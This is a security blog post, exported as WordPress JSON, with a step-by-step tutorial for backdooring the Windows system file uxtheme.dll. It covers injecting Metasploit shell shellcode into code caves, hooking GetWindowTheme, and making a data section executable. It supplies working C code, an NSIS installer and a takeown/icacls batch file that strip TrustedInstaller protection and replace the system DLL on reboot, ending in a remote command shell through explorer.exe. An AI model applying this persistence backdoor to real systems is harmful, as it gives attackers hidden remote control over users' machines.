{"id":1307,"date":"2016-07-29T17:32:02","date_gmt":"2016-07-29T17:32:02","guid":{"rendered":"http:\/\/www.gironsec.com\/blog\/?p=1307"},"modified":"2016-07-31T17:26:50","modified_gmt":"2016-07-31T17:26:50","slug":"backdooring-dlls-part-2","status":"publish","type":"post","link":"https:\/\/www.gironsec.com\/blog\/2016\/07\/backdooring-dlls-part-2\/","title":{"rendered":"Backdooring DLL’s Part 2"},"content":{"rendered":"

Today I have some good news. Backdooring a dll file is a lot easier than I first made it out to be. Especially if we skip the bullshit of the IAT and take advantage of shellcode. <\/p>\n

\"1394305570820\"<\/a><\/p>\n

There are problems with using shellcode – size constraints are different. In my previous example, I didn’t need much space – just under 40 bytes. Windows shellcode, to do anything cool, is much larger than Linux shellcode, especially if its in stages and encoded. This is fine tho as there are numerous ways to get more space. I can just as easily just mark another code section and write my data there. <\/p>\n

We’ll be attacking uxtheme.dll because as I said before it’s unsigned, used by everything, and has some space we can use. <\/p>\n

Step 1 is to find a cave. Like before, we launch our cave script, give it a size big enough for shellcode. Note that I’m attacking the 64 bit version of uxtheme.dll and utilizing 64 bit ida. <\/p>\n

\"cave\"<\/a><\/p>\n

See that?
\n<\/p>\n

\n
Possible alignment block(<\/span>s)<\/span>:\r\n.text:0000000171B56C77 393 alignment bytes\r\n.rdata:0000000171B88161 3743 alignment bytes\r\n.data:0000000171B8B928 1752 alignment bytes\r\n.didat:0000000171B92128 3800 alignment bytes\r\n<\/pre>\n<\/div>\n
Lot’s of space to work with. I don’t even need to adjust the PE header here and take advantage of the area at the end of the text section.<\/p>\n
Now let’s find an exe that uses uxtheme.dll and see what function it imports. <\/p>\n
\"ux_theme_exe\"<\/a><\/p>\n
Notepad will do I guess….wait, what am I thinking. What about explorer.exe? Everyone uses explorer.exe! I mean that’s the point of uxtheme.dll – to set theme options for explorer.exe. <\/p>\n
First thing we do is pick an imported dll function from uxtheme.dll within explorer.exe<\/p>\n
\"explorer_exe_import\"<\/a><\/p>\n
I’m going with GetWindowsTheme(). Double click on the import so we can see any external references.
\n\"explorer_import_2\"<\/a><\/p>\n
Luckily there’s only 2. We need to find out which one is set when a new theme is selected within explorer. For this we need to fire up our debugger. In this case, I’m using x64dbg which is awesome, to attach to explorer.exe.<\/p>\n
Once we’re attached (run debugger as admin), we’ll need the proper addresses to set breakpoints on. Because of relocation, the addresses seen in IDA will not match what is seen in the debugger. It’s an easy fix however – just need the base address…(available from the memory window tab) which is 7FF669860000. This address will be different every time.
\n\"explorer_dbg\"<\/a><\/p>\n
So now we plug this into the ‘rebase’ menu in IDA (Edit->Segments->Rebase Program):
\n\"rebase\"<\/a>
\nAnd IDA’s addresses will then match what we see in the debugger. Useful huh?<\/p>\n
Anyways, bringing up external references to our selected GetWindowTheme() function shows us addresses 00007FF669898096 and 00007FF6699588B6. Because X64dbg attempts to mimic windbg in functionality, all you have to do break on these addresses is by using the command bar at the bottom:
\n\"breakpoint\"<\/a><\/p>\n
Running the theme manager and selecting a theme seems to set off our breakpoint at address 00007FF669898096. This address and the event (selecting a theme in the windows Theme manager) is our magic ticket.
\n\"explorer_dbg_2\"<\/a><\/p>\n
So now let’s inspect the function within uxtheme.dll. We need at least 5 bytes to jump to a useful location.
\n\"uxtheme_ida_2\"<\/a>
\nSee that right there? The ‘or eax,0xFFFFFFFF’ That’s exactly what we want. The op codes for that operation are ‘0D FF FF FF FF’ – 5 bytes is just what we need for a long jump. <\/p>\n
Now we need some code to put inside. Recall from before, I have 393 alignment bytes (junk bytes) at address .text:0000000171B56C77. Plenty to work with.<\/p>\n
Let’s boot up Metasploit and see what we can grab.
\n\"win_shellcode_0\"<\/a><\/p>\n
275 bytes – just enough size to spawn a cmd shell without fucking with the PE structure. Super duper. But what about an actual remote command shell tho?<\/p>\n
\"win_shellcode_1\"<\/a><\/p>\n
505 bytes? It’s too fuckin big to fit in our 393 byte space.
\n\"shellcode_64bit_bind_too_big\"<\/a><\/p>\n
That’s no problem though. We have other areas in the DLL we can make use of.
\n<\/p>\n
\n
Possible alignment block(<\/span>s)<\/span>:\r\n.text:0000000171B56C77 393 alignment bytes\r\n.rdata:0000000171B88161 3743 alignment bytes\r\n.data:0000000171B8B928 1752 alignment bytes\r\n.didat:0000000171B92128 3800 alignment bytes\r\n<\/pre>\n<\/div>\n
3743 bytes in ‘.rdata’. Historically ‘.rdata’ will contain read only data structures, sometimes debug info. But there’s no real standard. Problem is, if we try and run code from this area, we will get an access violation and crash. This is because the section is not meant to have code in it. We can mark the area executable like our ‘.text’ section and drop our 505 bytes of data inside. <\/p>\n
Here I’m using CFF explorer again to do just that:
\n\"section_header_fun\"<\/a><\/p>\n
Now we need to modify the DLL export entry GetWindowTheme() to jump to address 0000000171B88161 which will contain our shellcode as well as a jump back at address 0000000171B05350. <\/p>\n
For simplicity’s sake, I’m using x64dbg again and am loading the dll directly into the debugger. We’ll have to rebase again to use the right addresses within IDA. Luckily we know how.
\n\"1469023497982\"<\/a><\/p>\n
So we go to the address of the export, modify the ‘or eax,FFFFFFFF’ instructions to jump to our new address of junk bytes in the ‘.rdata’ section.
\n\"uxtheme_dbg\"<\/a><\/p>\n
Now we paste our shellcode (Right click area, choose Binary->Paste Ignore Size) into the are we jumped to, and for good measure, we add our old instructions we replaced followed by a jump back – because we roll clean. <\/p>\n
\"uxtheme_dbg_2\"<\/a><\/p>\n
Now we save our work. Choose the ‘Patches’ menu and select ‘Patch File’ to save our work.
\n\"uxtheme_dbg_3\"<\/a><\/p>\n
Now we confirm our changes in IDA:
\n\"uxtheme_ida_3\"<\/a><\/p>\n
OK then – we now have a backdoored uxtheme.dll file that activates via explorer.exe when a user selects a new theme. So now we have to figure out how the heck we can replace this file so that our dll is loaded instead of the one in system32. <\/p>\n
There seems to be a multitude of uxtheme changing applications on the net. It seems hacking \/ tweaking windows is popular. This could be our way in. <\/p>\n
I decided on this tool Ultra Uxtheme Patcher<\/a>. <\/p>\n
It looks innocent enough.
\n\"uxtheme_patcher\"<\/a><\/p>\n
Running the thing with procmon  with ‘uxtheme.dll’ as part of the path filter reveals a little bit on what it’s doing and how it’s patching uxtheme.dll.
\n\"uxtheme_replacer_reverse_engineering_0\"<\/a><\/p>\n
It looks as though the program is creating a file named ‘uxtheme.dll.new’, naming the old DLL file as ‘uxtheme.dll.backup’ and attempting to write to the system file. This is incomplete information. Loading the thing into ApiMonitor (Rohit labs rocks), we get a clearer picture. <\/p>\n
\"uxtheme_replacer_reverse_engineering\"<\/a><\/p>\n
As I suspected – the file is being moved and delayed until a reboot has occurred. The MoveFileEx<\/a> function has a parameter(MOVEFILE_DELAY_UNTIL_REBOOT) for delaying movement of files that would otherwise be in use until reboot. This makes it possible to modify system files. Ever wonder why Windows needs to reboot after every update? This is why. <\/p>\n
That said we don’t need to do much to replace uxtheme.dll with our own backdoored code. Just need to code up some C app. <\/p>\n
<\/p>\n
\n
#include <windows.h><\/span>\r\n#include <stdio.h><\/span>\r\n\r\n#define MAX_BUF 1024<\/span>\r\n\r\nvoid<\/span> GiveShutdownPrivs<\/span>(void<\/span>);\r\n\r\nint<\/span> main<\/span>(void<\/span>)\r\n{\r\n    GiveShutdownPrivs();\t\r\n\tMoveFileEx("%windir%<\/span>\\\\<\/span>system32<\/span>\\\\<\/span>uxtheme.dll"<\/span>,"%windir%<\/span>\\\\<\/span>system32<\/span>\\\\<\/span>uxtheme.dll.old"<\/span>, MOVEFILE_DELAY_UNTIL_REBOOT);\r\n\tMoveFileEx("uxtheme_modded.dll"<\/span>,"%windir%<\/span>\\\\<\/span>system32<\/span>\\\\<\/span>uxtheme.dll"<\/span>, MOVEFILE_DELAY_UNTIL_REBOOT);\r\n\tprintf("File moved, now we'e gonna reboot<\/span>\\r\\n<\/span>"<\/span>);\r\n\tgetchar();\r\n\tExitWindowsEx(EWX_REBOOT|<\/span>EWX_FORCEIFHUNG, 0<\/span>);\r\n}\r\n\r\nvoid<\/span> GiveShutdownPrivs<\/span>(void<\/span>)\r\n{\r\n\tHANDLE hToken;\r\n    TOKEN_PRIVILEGES tkp;\r\n\r\n    if<\/span> (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES|<\/span>TOKEN_QUERY, &<\/span>hToken))\r\n    {\r\n      if<\/span> (LookupPrivilegeValue(NULL<\/span>, SE_SHUTDOWN_NAME, &<\/span>tkp.Privileges[0<\/span>].Lulolwutid))\r\n      {\r\n        tkp.PrivilegeCount =<\/span> 1<\/span>;\r\n        tkp.Privileges[0<\/span>].Attributes =<\/span> SE_PRIVILEGE_ENABLED;\r\n      \r\n        AdjustTokenPrivileges(hToken, FALSE, &<\/span>tkp, 0<\/span>, NULL<\/span>, 0<\/span>);\r\n      }else<\/span>\r\n\t\t{\r\n\t\t\tprintf("This doesn't work if you're not an admin!<\/span>\\r\\n<\/span>"<\/span>);\r\n\t\t\tExitProcess(1<\/span>);\r\n\t\t}\r\n\r\n\r\n      CloseHandle(hToken);\r\n    }\r\n}\r\n<\/pre>\n<\/div>\n
Short and simple code, however this will ONLY work on XP or if we first remove the TrustedInstaller permissions from uxtheme.dll<\/a>. This can also be done programmatically of course so let’s make use of NSIS. <\/p>\n
<\/p>\n
\n
!ifndef<\/span> ___X64__NSH___\r\n!define<\/span> ___X64__NSH___\r\n\r\n!include<\/span> LogicLib.nsh\r\n\r\n\r\n!define<\/span> IsWow64 `"" IsWow64 ""`<\/span>\r\n!macro<\/span> _IsWow64 _a _b _t _f\r\n  !insertmacro<\/span> _LOGICLIB_TEMP\r\n  System<\/span>::Call<\/span> kernel32<\/span>::GetCurrentProcess<\/span>()p.s\r\n  System<\/span>::Call<\/span> kernel32<\/span>::IsWow64Process<\/span>(ps,*i0s)\r\n  Pop<\/span> $_LOGICLIB_TEMP<\/span>\r\n  !insertmacro<\/span> _!=<\/span> $_LOGICLIB_TEMP<\/span> 0 `${_t}`<\/span> `${_f}`<\/span>\r\n!macroend<\/span>\r\n\r\n\r\n!define<\/span> RunningX64 `"" RunningX64 ""`<\/span>\r\n!macro<\/span> _RunningX64 _a _b _t _f \r\n  !if<\/span> ${NSIS_PTR_SIZE}<\/span> ><\/span> 4\r\n    !insertmacro<\/span> LogicLib_JumpToBranch `${_t}`<\/span> `${_f}`<\/span>\r\n  !else<\/span>\r\n    !insertmacro<\/span> _IsWow64 `${_a}`<\/span> `${_b}`<\/span> `${_t}`<\/span> `${_f}`<\/span>\r\n  !endif<\/span>\r\n!macroend<\/span>\r\n\r\n\r\n!define<\/span> DisableX64FSRedirection "!insertmacro DisableX64FSRedirection"<\/span>\r\n!macro<\/span> DisableX64FSRedirection\r\n  System<\/span>::Call<\/span> kernel32<\/span>::Wow64EnableWow64FsRedirection<\/span>(i0)\r\n!macroend<\/span>\r\n\r\n!define<\/span> EnableX64FSRedirection "!insertmacro EnableX64FSRedirection"<\/span>\r\n!macro<\/span> EnableX64FSRedirection\r\n  System<\/span>::Call<\/span> kernel32<\/span>::Wow64EnableWow64FsRedirection<\/span>(i1)\r\n!macroend<\/span>\r\n\r\n\r\n!endif<\/span> # !___X64__NSH___<\/span>\r\n\r\n!define<\/span> PRODUCT_CODE "joereplacer"<\/span>\r\n \r\nRequestExecutionLevel<\/span> admin<\/span>\r\nShowInstDetails<\/span> show<\/span> \r\n \r\n; The name of the installer<\/span>\r\nName<\/span> "ReplaceOnReboot"<\/span>\r\n \r\n; The file to write<\/span>\r\nOutFile<\/span> "JoesUxThemeReplacer.exe"<\/span>\r\n \r\n\r\n \r\nSection<\/span> ""<\/span> \r\n    MessageBox<\/span> MB_OK<\/span> "Just DO IT"<\/span>\r\n\tSetOutPath<\/span> $SYSDIR<\/span>\r\n\t${DisableX64FSRedirection}<\/span>\r\n\tFile<\/span> "windows7_uxtheme.dll"<\/span>\r\n\tFile<\/span> "what_i_need.bat"<\/span>\r\n \t;Call MoveFileEx on each file above (Params: <source>, <destination>, 4) 5 == Move on Reboot && Replace Existing<\/span>\r\n\t; need trustedinstaller privs to do this.<\/span>\r\n\tSystem<\/span>::Call<\/span> "kernel32::CopyFile(t '<\/span>$SYSDIR<\/span>\\uxtheme.dll', t '<\/span>$SYSDIR<\/span>\\uxtheme.dll.old', b 1)"<\/span>\r\n\tExec<\/span> '"$SYSDIR\\what_i_need.bat"'<\/span>\r\n\tSystem<\/span>::Call<\/span> "kernel32::MoveFileEx(t '<\/span>$SYSDIR<\/span>\\windows7_uxtheme.dll', t '<\/span>$SYSDIR<\/span>\\uxtheme.dll', i 5)"<\/span>\r\n \r\nSectionEnd<\/span> ; end the section<\/span>\r\n<\/pre>\n<\/div>\n
The file ‘what_i_need.bat’ contains 2 commands – takeown and icacls to remove trustedinstaller privileges and grant the admin full privileges.
\n<\/p>\n
\n
@echo<\/span> off<\/span>\r\ntakeown \/F c:\\windows\\system32<\/span>\\uxtheme.dll \/A\r\nicacls c:\\windows\\system32<\/span>\\uxtheme.dll \/grant administrators:F\r\n<\/pre>\n<\/div>\n
To use this script you need to place your backdoored dll and batch file into the same folder as this script and run the compile NSIS script tool. <\/p>\n
Now let’s try this on my VM. I’m using the same shellcode, just a different version of the dll (windows 7 x64).
\n\"my_vm\"<\/a><\/p>\n
No problems running the thing. <\/p>\n
After a quick reboot, our backdoored uxtheme.dll file takes the place of the old one. Our backdoor code is called on startup initialization of explorer.exe, so we don’t even need to wait for the user to select a theme. As you can see, the firewall is going a little crazy with explorer:
\n\"seems_legit\"<\/a><\/p>\n
When I connect to the our local host via a raw connection in putty, here’s our command shell:
\n\"yessir\"<\/a><\/p>\n
Fear me!<\/p>\n
All files, shellcode, screenshots, and code are available for download here<\/a>.<\/p>\n
Stay tuned for part 3 when I delve into Linux.<\/p>\n
Happy hacking!<\/p>\n
\"1468389065767\"<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
Today I have some good news. Backdooring a dll file is a lot easier than I first made it out to be. Especially if we skip the bullshit of the IAT and take advantage of shellcode. There are problems with using shellcode – size constraints are different. In my previous example, I didn’t need much […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[4,6,7],"tags":[110,72,106],"_links":{"self":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/1307"}],"collection":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/comments?post=1307"}],"version-history":[{"count":8,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/1307\/revisions"}],"predecessor-version":[{"id":1346,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/1307\/revisions\/1346"}],"wp:attachment":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/media?parent=1307"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/categories?post=1307"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/tags?post=1307"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}